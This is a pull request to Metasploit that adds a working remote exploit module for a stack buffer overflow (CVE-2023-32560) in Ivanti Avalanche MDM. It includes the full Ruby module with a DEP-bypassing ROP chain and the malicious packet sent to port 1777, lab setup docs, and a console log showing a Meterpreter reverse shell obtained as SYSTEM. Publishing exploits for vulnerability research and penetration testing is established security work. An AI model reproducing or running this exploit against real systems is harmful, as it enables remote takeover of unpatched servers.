### PR TITLE
Add Ivanti Avalanche MDM Buffer Overflow Exploit (CVE-2023-32560)

### DIFF
--- a/documentation/modules/exploit/windows/misc/ivanti_avalanche_mdm_bof.md
+++ b/documentation/modules/exploit/windows/misc/ivanti_avalanche_mdm_bof.md
@@ -17,7 +17,27 @@ The original analysis and the vulnerability discovery is done by the Tenable.
 Check [here](https://www.tenable.com/security/research/tra-2023-27) for public advisory.
 
 ## Installation
-For installing the vulnerable version follow the steps below,
+The software requires a version of MSSQL Server to be installed. The installation
+instructions use MSSQL Server 2012, but 2016 and 2017 worked for my setup. Ensure that
+`SQL Server and Windows Authentication Mode` is selected as the default for
+server authentication. This can either be done at installation or via
+SQL Server Management Studio, available from https://learn.microsoft.com/en-us/sql/ssms/download-sql-server-management-studio-ssms.
+
+1. Open SQL Server Management Studio and connect to the instance
+2. Right click on the instance and select `Properties`
+3. Click the `Security` page
+4. Underneath `Server Authentication`, select `SQL Server and Windows Authentication Mode` and `Ok`.
+5. Open SQL Server Configuration Manager -> SQL Server Network Configuration -> Protocols for MSSQLSERVER -> TCP/IP
+Change from Disable to Enabled.
+6. SQL Server Configuration Manager -> SQL Server Services -> Stop all Services -> Start just the SQL Server (MSSQLSERVER) service.
+7. Go back to SQL Server Management Studio.
+8. Security -> Logins -> sa -> Right click -> Select Properties -> Status -> Toggle Login to Enabled -> Ok
+9. Execute the following SQL statement in SQL Server Management Studio: `ALTER LOGIN sa WITH PASSWORD = 'theSAUser123';`
+10. You should now be able to run the installer and set the hostname to `127.0.0.1`,
+set the username to `sa`, and the password to `theSAUser123`.
+11. Now you can proceed to installing the Ivanti Avalanche MDM software.
+
+For installing the vulnerable Ivanti Avalanche MDM version follow the steps below,
 1. To obtain the vulnerable versions of the MDM setup, first create a customer account at
 [Ivanti](https://success.ivanti.com/customers/Community_RegStep1_Page?lp=register) (trial license is sufficient)
 2. Navigate [here](https://www.wavelink.com/Download-Avalanche_Mobile-Device-Management-Software/)
@@ -25,6 +45,10 @@ and download any version **below** `v6.4.1`
 3. Follow the installation steps.
 
 After these steps, the MDM service should be accessible on port 1777.
+**Note: If MDM port is not listening or unresponsive, try restarting the 'Wavelink Avalanche Manager' service.**
+
+In case the above doesn't work, instructions for installing Ivanti Avalanche can be found
+[here](https://forums.ivanti.com/s/article/Best-Known-Method-for-installing-Avalanche-6-x-using-MSSQL-Server-2008-R2-Express-DB-or-2012-Express-Advanced)
 
 ## Verification Steps
 

--- a/documentation/modules/exploit/windows/misc/ivanti_avalanche_mdm_bof.md
+++ b/documentation/modules/exploit/windows/misc/ivanti_avalanche_mdm_bof.md
@@ -1,0 +1,60 @@
+## Vulnerable Application
+
+Ivanti Avalanche powered by Wavelink is a mobile device management system. Network security
+features allow you to manage wireless settings (including encryption and authentication),
+and apply those settings on a schedule throughout the network. Software distribution features
+allow you to schedule software distribution to specific devices from the Avalanche Console.
+Avalanche also provides tools for managing alerts and reports.
+
+This module exploits a buffer overflow condition in Ivanti Avalanche MDM versions before `v6.4.1`.
+An attacker can send a specially crafted message to the Wavelink Avalanche Manager,
+which could result in arbitrary code execution with the `NT/AUTHRITY SYSTEM` permissions.
+This vulnerability occurs during the processing of 3/5/8/100/101/102 item data types.
+The program tries to copy the item data using `qmemcopy` to a fixed size data buffer on stack.
+Upon successfull exploitation the attacker gains full access to the target system.
+
+The original analysis and the vulnerability discovery is done by the Tenable.
+Check [here](https://www.tenable.com/security/research/tra-2023-27) for public advisory.
+
+## Testing
+For installing the vulnerable version follow the steps below,
+1. To obtain the vulnerable versions of the MDM setup, first create a customer account at
+[Ivanti](https://success.ivanti.com/customers/Community_RegStep1_Page?lp=register) (trial license is sufficient)
+2. Navigate [here](https://www.wavelink.com/Download-Avalanche_Mobile-Device-Management-Software/)
+and download any version **below** `v6.4.1`
+3. Follow the installation steps.
+
+After these steps, the MDM service should be accessible on port 1777.
+
+## Verification Steps
+
+1. msfconsole
+2. Do: `use exploit/windows/misc/ivanti_avalanche_mdm_bof`
+3. Do: `set RHOST [IP]`
+4. Do: `run`
+5. You should get a session.
+
+## Options
+
+## Scenarios
+
+```
+msf6 > use exploit/windows/misc/ivanti_avalanche_mdm_bof
+[*] Using configured payload windows/meterpreter/reverse_tcp
+msf6 exploit(windows/misc/ivanti_avalanche_mdm_bof) > set rhosts 192.168.56.109
+rhosts => 192.168.56.109
+msf6 exploit(windows/misc/ivanti_avalanche_mdm_bof) > set lhost 192.168.56.1
+lhost => 192.168.56.1
+msf6 exploit(windows/misc/ivanti_avalanche_mdm_bof) > run
+
+[*] Started reverse TCP handler on 192.168.56.1:4444 
+[*] 192.168.56.109:1777 - Connecting to target...
+[*] 192.168.56.109:1777 - Sending payload...
+[*] Sending stage (175686 bytes) to 192.168.56.109
+[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.109:49967) at 2023-08-25 19:15:42 +0200
+
+meterpreter > getuid 
+Server username: NT AUTHORITY\SYSTEM
+meterpreter >
+
+```

--- a/documentation/modules/exploit/windows/misc/ivanti_avalanche_mdm_bof.md
+++ b/documentation/modules/exploit/windows/misc/ivanti_avalanche_mdm_bof.md
@@ -11,7 +11,7 @@ An attacker can send a specially crafted message to the Wavelink Avalanche Manag
 which could result in arbitrary code execution with the `NT/AUTHORITY SYSTEM` permissions.
 This vulnerability occurs during the processing of 3/5/8/100/101/102 item data types.
 The program tries to copy the item data using `qmemcopy` to a fixed size data buffer on stack.
-Upon successfull exploitation the attacker gains full access to the target system.
+Upon successful exploitation the attacker gains full access to the target system.
 
 The original analysis and the vulnerability discovery is done by the Tenable.
 Check [here](https://www.tenable.com/security/research/tra-2023-27) for public advisory.

--- a/documentation/modules/exploit/windows/misc/ivanti_avalanche_mdm_bof.md
+++ b/documentation/modules/exploit/windows/misc/ivanti_avalanche_mdm_bof.md
@@ -8,7 +8,7 @@ Avalanche also provides tools for managing alerts and reports.
 
 This module exploits a buffer overflow condition in Ivanti Avalanche MDM versions before `v6.4.1`.
 An attacker can send a specially crafted message to the Wavelink Avalanche Manager,
-which could result in arbitrary code execution with the `NT/AUTHRITY SYSTEM` permissions.
+which could result in arbitrary code execution with the `NT/AUTHORITY SYSTEM` permissions.
 This vulnerability occurs during the processing of 3/5/8/100/101/102 item data types.
 The program tries to copy the item data using `qmemcopy` to a fixed size data buffer on stack.
 Upon successfull exploitation the attacker gains full access to the target system.

--- a/documentation/modules/exploit/windows/misc/ivanti_avalanche_mdm_bof.md
+++ b/documentation/modules/exploit/windows/misc/ivanti_avalanche_mdm_bof.md
@@ -16,7 +16,7 @@ Upon successful exploitation the attacker gains full access to the target system
 The original analysis and the vulnerability discovery is done by the Tenable.
 Check [here](https://www.tenable.com/security/research/tra-2023-27) for public advisory.
 
-## Testing
+## Installation
 For installing the vulnerable version follow the steps below,
 1. To obtain the vulnerable versions of the MDM setup, first create a customer account at
 [Ivanti](https://success.ivanti.com/customers/Community_RegStep1_Page?lp=register) (trial license is sufficient)

--- a/modules/exploits/windows/misc/ivanti_avalanche_mdm_bof.rb
+++ b/modules/exploits/windows/misc/ivanti_avalanche_mdm_bof.rb
@@ -55,7 +55,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     register_options(
       [
-        OptPort.new('RPORT', [true, 'The remote port', 1777])
+        OptPort.new('RPORT', [true, 'The remote Avalanche Manager port', 1777])
       ]
     )
   end

--- a/modules/exploits/windows/misc/ivanti_avalanche_mdm_bof.rb
+++ b/modules/exploits/windows/misc/ivanti_avalanche_mdm_bof.rb
@@ -99,7 +99,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # Because of the compiler optimized `qmemcpy`
     # we are not able to directly return to out smashed stack.
-    # This buffer re-arranges the entire stack for excaping
+    # This buffer re-arranges the entire stack for escaping
     # the longass function without crashing.
     buf = ('A' * 136)
     buf += [0].pack('V')             # set empty register

--- a/modules/exploits/windows/misc/ivanti_avalanche_mdm_bof.rb
+++ b/modules/exploits/windows/misc/ivanti_avalanche_mdm_bof.rb
@@ -45,7 +45,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'DisclosureDate' => '2023-08-14',
         'DefaultTarget' => 0,
         'Notes' => {
-          'Stability' => [CRASH_SERVICE_DOWN],
+          'Stability' => [CRASH_SAFE],
           'Reliability' => [REPEATABLE_SESSION],
           'SideEffects' => []
         }

--- a/modules/exploits/windows/misc/ivanti_avalanche_mdm_bof.rb
+++ b/modules/exploits/windows/misc/ivanti_avalanche_mdm_bof.rb
@@ -16,7 +16,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'Description' => %q{
           This module exploits a buffer overflow condition in Ivanti Avalanche MDM versions before v6.4.1.
           An attacker can send a specially crafted message to the Wavelink Avalanche Manager,
-          which could result in arbitrary code execution with the NT/AUTHRITY SYSTEM permissions.
+          which could result in arbitrary code execution with the NT/AUTHORITY SYSTEM permissions.
           This vulnerability occurs during the processing of 3/5/8/100/101/102 item data types.
           The program tries to copy the item data using `qmemcopy` to a fixed size data buffer on stack.
           Upon successfull exploitation the attacker gains full access to the target system.

--- a/modules/exploits/windows/misc/ivanti_avalanche_mdm_bof.rb
+++ b/modules/exploits/windows/misc/ivanti_avalanche_mdm_bof.rb
@@ -37,6 +37,7 @@ class MetasploitModule < Msf::Exploit::Remote
           'EXITFUNC' => 'thread'
         },
         'Platform' => 'win',
+        'Arch' => ARCH_X86,
         'Payload' => {
           'BadChars' => "\x3b"
         },

--- a/modules/exploits/windows/misc/ivanti_avalanche_mdm_bof.rb
+++ b/modules/exploits/windows/misc/ivanti_avalanche_mdm_bof.rb
@@ -29,7 +29,6 @@ class MetasploitModule < Msf::Exploit::Remote
           'A researcher at Tenable' # Discovery
         ],
         'References' => [
-          ['TRA', '2023-27'],
           ['CVE', '2023-32560'],
           ['URL', 'https://www.tenable.com/security/research/tra-2023-27'],
           ['URL', 'https://forums.ivanti.com/s/article/Avalanche-Vulnerabilities-Addressed-in-6-4-1']

--- a/modules/exploits/windows/misc/ivanti_avalanche_mdm_bof.rb
+++ b/modules/exploits/windows/misc/ivanti_avalanche_mdm_bof.rb
@@ -101,7 +101,7 @@ class MetasploitModule < Msf::Exploit::Remote
     # we are not able to directly return to out smashed stack.
     # This buffer re-arranges the entire stack for escaping
     # the longass function without crashing.
-    buf = ('A' * 136)
+    buf = Rex::Text.rand_text_alpha(136)
     buf += [0].pack('V')             # set empty register
     buf += [0].pack('V')             # set empty register
     buf += [0].pack('V')             # stack alignment buffer
@@ -120,7 +120,7 @@ class MetasploitModule < Msf::Exploit::Remote
     value2 = "\x31\x39"
 
     name3 = 'p.waitprofile'
-    value3 = (buf + rop_chain + ("\x90" * (expected_payload_size - payload.encoded.length)) + payload.encoded)
+    value3 = (buf + rop_chain + make_nops(expected_payload_size - payload.encoded.length) + payload.encoded)
 
     item1 = [2].pack('N')
     item1 += [name1.length].pack('N')

--- a/modules/exploits/windows/misc/ivanti_avalanche_mdm_bof.rb
+++ b/modules/exploits/windows/misc/ivanti_avalanche_mdm_bof.rb
@@ -78,7 +78,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def exploit
     expected_payload_size = 622
 
-    # This is a custom ROP chain for byspassing DEP via VirtualAlloc
+    # This is a custom ROP chain for bypassing DEP via VirtualAlloc
     rop_chain = [0x00544498].pack('V') # pop edx ; mov eax, 0x00000022 ; ret ;
     rop_chain += [0x00001000].pack('V')  # flAllocationType
     rop_chain += [0x00499ac0].pack('V')  # pop eax ; ret ;

--- a/modules/exploits/windows/misc/ivanti_avalanche_mdm_bof.rb
+++ b/modules/exploits/windows/misc/ivanti_avalanche_mdm_bof.rb
@@ -19,7 +19,7 @@ class MetasploitModule < Msf::Exploit::Remote
           which could result in arbitrary code execution with the NT/AUTHORITY SYSTEM permissions.
           This vulnerability occurs during the processing of 3/5/8/100/101/102 item data types.
           The program tries to copy the item data using `qmemcopy` to a fixed size data buffer on stack.
-          Upon successfull exploitation the attacker gains full access to the target system.
+          Upon successful exploitation the attacker gains full access to the target system.
 
           This vulnerability has been tested against Ivanti Avalanche MDM v6.4.0.0 on Windows 10.
         },

--- a/modules/exploits/windows/misc/ivanti_avalanche_mdm_bof.rb
+++ b/modules/exploits/windows/misc/ivanti_avalanche_mdm_bof.rb
@@ -1,0 +1,160 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::Tcp
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Ivanti Avalanche MDM Buffer Overflow',
+        'Description' => %q{
+          This module exploits a buffer overflow condition in Ivanti Avalanche MDM versions before v6.4.1.
+          An attacker can send a specially crafted message to the Wavelink Avalanche Manager,
+          which could result in arbitrary code execution with the NT/AUTHRITY SYSTEM permissions.
+          This vulnerability occurs during the processing of 3/5/8/100/101/102 item data types.
+          The program tries to copy the item data using `qmemcopy` to a fixed size data buffer on stack.
+          Upon successfull exploitation the attacker gains full access to the target system.
+
+          This vulnerability has been tested against Ivanti Avalanche MDM v6.4.0.0 on Windows 10.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Ege BALCI egebalci[at]pm.me' # PoC & Msf Module
+        ],
+        'References' => [
+          ['TRA', '2023-27'],
+          ['CVE', '2023-32560'],
+          ['URL', 'https://www.tenable.com/security/research/tra-2023-27'],
+          ['URL', 'https://forums.ivanti.com/s/article/Avalanche-Vulnerabilities-Addressed-in-6-4-1']
+        ],
+        'DefaultOptions' => {
+          'EXITFUNC' => 'thread'
+        },
+        'Platform' => 'win',
+        'Payload' => {
+          'BadChars' => "\x3b"
+        },
+        'Targets' => [['Ivanti Avalanche <= v6.4.0.0', {}]],
+        'Privileged' => true,
+        'DisclosureDate' => '2023-08-14',
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SERVICE_DOWN],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => []
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptPort.new('RPORT', [true, 'The remote port', 1777])
+      ]
+    )
+  end
+
+  def check
+    begin
+      connect
+    rescue StandardError
+      print_error('Could not connect to target!')
+      return Exploit::CheckCode::Safe
+    end
+    res = sock.get_once
+
+    if res =~ /p\.guid/
+      return Exploit::CheckCode::Appears
+    else
+      return Exploit::CheckCode::Safe
+    end
+  end
+
+  def exploit
+    expected_payload_size = 622
+
+    # This is a custom ROP chain for byspassing DEP via VirtualAlloc
+    rop_chain = [0x00544498].pack('V') # pop edx ; mov eax, 0x00000022 ; ret ;
+    rop_chain += [0x00001000].pack('V')  # flAllocationType
+    rop_chain += [0x00499ac0].pack('V')  # pop eax ; ret ;
+    rop_chain += [0x0056a208].pack('V')  # VirtualAlloc IAT entry
+    rop_chain += [0x00566650].pack('V')  # pop ecx ; ret ;
+    rop_chain += [0x00000040].pack('V')  # flProtect
+    rop_chain += [0x0054b079].pack('V')  # pop ebx ; ret ;
+    rop_chain += [0x00000320].pack('V')  # dwSize
+    rop_chain += [0x00402323].pack('V')  # pop ebp; ret
+    rop_chain += [0x0055642a].pack('V')  # pop eax; ret
+    rop_chain += [0x0052ad90].pack('V')  # pop esi; ret;
+    rop_chain += [0x0042792f].pack('V')  # jmp [eax]
+    rop_chain += [0x00521907].pack('V')  # pop edi ; ret ;
+    rop_chain += [0x00568968].pack('V')  # ret ;
+    rop_chain += [0x004995ab].pack('V')  # pushad ; ret ;
+    rop_chain += [0x00499c20].pack('V')  # push esp ; ret
+
+    # Because of the compiler optimized `qmemcpy`
+    # we are not able to directly return to out smashed stack.
+    # This buffer re-arranges the entire stack for excaping
+    # the longass function without crashing.
+    buf = ('A' * 136)
+    buf += [0].pack('V')             # set empty register
+    buf += [0].pack('V')             # set empty register
+    buf += [0].pack('V')             # stack alignment buffer
+    buf += [0].pack('V')             # stack alignment buffer
+    buf += [0x00511a80].pack('V')    # ESP -> $(rop: "add esp, 0x10 ; ret ;")
+    buf += [0x00583900].pack('V')    # .data section scratch space
+    buf += [0x00583900].pack('V')    # .data section scratch space
+    buf += [0x00585858].pack('V')    # .data section scratch space
+    buf += [0x00585857].pack('V')    # .data section scratch space
+
+    # ==================
+    name1 = 'h.mid'
+    value1 = "\x30"
+
+    name2 = 'h.cmd'
+    value2 = "\x31\x39"
+
+    name3 = 'p.waitprofile'
+    value3 = (buf + rop_chain + ("\x90" * (expected_payload_size - payload.encoded.length)) + payload.encoded)
+
+    item1 = [2].pack('N')
+    item1 += [name1.length].pack('N')
+    item1 += [value1.length].pack('N')
+    item1 += name1 + value1
+
+    item2 = [2].pack('N')
+    item2 += [name2.length].pack('N')
+    item2 += [value2.length].pack('N')
+    item2 += name2 + value2
+
+    item3 = [101].pack('N')
+    item3 += [name3.length].pack('N')
+    item3 += [value3.length].pack('N')
+    item3 += name3 + value3
+
+    hp = item1 + item2 + item3
+    if hp.length % 16 != 0 # Add padding if not power of 16
+      hp += ("\x00" * (16 - (hp.length % 16)))
+    end
+
+    preamble = [hp.length + 16].pack('N')
+    preamble += [item1.length + item2.length].pack('N')
+    preamble += [(hp.length + 16) - 0x3b].pack('N')
+    preamble += [0].pack('N')
+
+    packet = preamble + hp
+
+    print_status('Connecting to target...')
+    connect
+    res = sock.get_once
+    fail_with(Failure::UnexpectedReply, 'Could not connect to MDM service - no response') if res.nil?
+
+    print_status('Sending payload...')
+    sock.put(packet)
+    disconnect
+  end
+end

--- a/modules/exploits/windows/misc/ivanti_avalanche_mdm_bof.rb
+++ b/modules/exploits/windows/misc/ivanti_avalanche_mdm_bof.rb
@@ -25,7 +25,8 @@ class MetasploitModule < Msf::Exploit::Remote
         },
         'License' => MSF_LICENSE,
         'Author' => [
-          'Ege BALCI egebalci[at]pm.me' # PoC & Msf Module
+          'Ege BALCI egebalci[at]pm.me', # PoC & Msf Module
+          'A researcher at Tenable' # Discovery
         ],
         'References' => [
           ['TRA', '2023-27'],


### PR DESCRIPTION
Hello 👋

This module exploits a buffer overflow condition in Ivanti Avalanche MDM versions before `v6.4.1`.  Avalanche MDM has its own communication protocol and this vulnerability occurs during the processing of `3/5/8/100/101/102` item data types inside the service executable. Upon successful exploitation attacker gains code execution with `NT/AUTHRITY SYSTEM` permissions. 

Despite being a stack based buffer overflow it was surprisingly hard to craft a working exploit. The overflow happens during `qmemcopy`, but this function is optimized by the compiler and in-lined into a very long function. I had to adjust almost the entire stack for surviving this very long function without crashing. The DEP bypass and stack alignment seems to be stable, I have tested the module against Windows 10 and 7 but not in Windows 11.

## Testing Environment Setup
For installing the vulnerable version follow the steps below,
1. To obtain the vulnerable versions of the MDM setup, first create a customer account at [Ivanti](https://success.ivanti.com/customers/Community_RegStep1_Page?lp=register) (trial license is sufficient)
2. Navigate [here](https://www.wavelink.com/Download-Avalanche_Mobile-Device-Management-Software/) and download any version **below** `v6.4.1`
3. Follow the installation steps.

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use exploit/windows/misc/ivanti_avalanche_mdm_bof`
- [ ] Do `set rhost [IP]`
- [ ] Do `set lhost [IP]`
- [ ] Do `run`
